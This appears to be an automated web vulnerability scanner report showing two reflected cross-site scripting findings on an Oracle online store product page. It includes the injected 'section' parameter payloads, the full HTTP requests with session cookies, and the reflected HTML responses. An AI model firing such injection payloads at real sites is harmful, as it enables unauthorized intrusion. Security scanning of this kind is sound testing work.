background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="3"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width=&quo..
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0&section=%27..

Parameters

Parameter Type Value
item GET 899068
beginIndex GET 0
section GET '" ns= alert(0x0016E4)
nsextt GET '" ns= netsparker(0x000A1A)
sitex GET 14405:1435532:US

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=%27%22%20ns=%20netsparker(0x0016E4)%20&nsextt=%27%22+ns%3D+netsparker%280x000A1A%29+&sitex=14405:1435532:US HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=899068§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=5ce64da47dd89b3ed8c945dc76ec4f0dcf1f85f89eba4704aad2f61ff27d9034.e34QbhaLa3mKbi0La3mQaNePax4Me0; GSI_pses=ZGC53388D31FEF05F6E86EF8FF4618BB7AA338618DD263DBFB27576CC75FF8CF5E36AE942AB4CF396B0A13FD1C5A68C493; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=cAdcxs0LfKpYDR1i17xlCZqNid
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=5ce64da47dd89b3ed8c945dc76ec4f0dcf1f85f89eba4704aad2f61ff27d9034.e34QbhaLa3mKbi0La3mQaNePax4Me0; path=/OA_HTML; secure
Content-Length: 9994
Date: Sun, 11 Sep 2011 18:05:14 GMT
































<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG0D556A875F5E7A9D5A98D0B054806FE8D30BAF93FA180CBB&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $Header: ibeCCtdItemLeftBins.jsp 120.2 2005/11/16 ..
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0&section='%3..

Parameters

Parameter Type Value
item GET 899068
beginIndex GET 0
section GET '><net sparker=alert(0x001701)>
sitex GET 14405:1435532:US
cg GET -200
kw GET 3

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion='%3E%3Cnet%20sparker=netsparker(0x001701)%3E&sitex=14405:1435532:US&cg=-200&kw=3 HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=87615&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=5ce64da47dd89b3ed8c945dc76ec4f0dcf1f85f89eba4704aad2f61ff27d9034.e34QbhaLa3mKbi0La3mQaNePax4Oe0; GSI_pses=ZG83C2A8DB898BFFE4B7859E28A1C6B900039C2515E0B889E1AE181A0941E8A4B0129F677831B25EDFB800652795E1F993; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=a7FGp70V7ZsqMrDYvVW3nuQRI3
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=5ce64da47dd89b3ed8c945dc76ec4f0dcf1f85f89eba4704aad2f61ff27d9034.e34QbhaLa3mKbi0La3mQaNePax4Oe0; path=/OA_HTML; secure
Content-Length: 9922
Date: Sun, 11 Sep 2011 18:05:18 GMT
































<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a 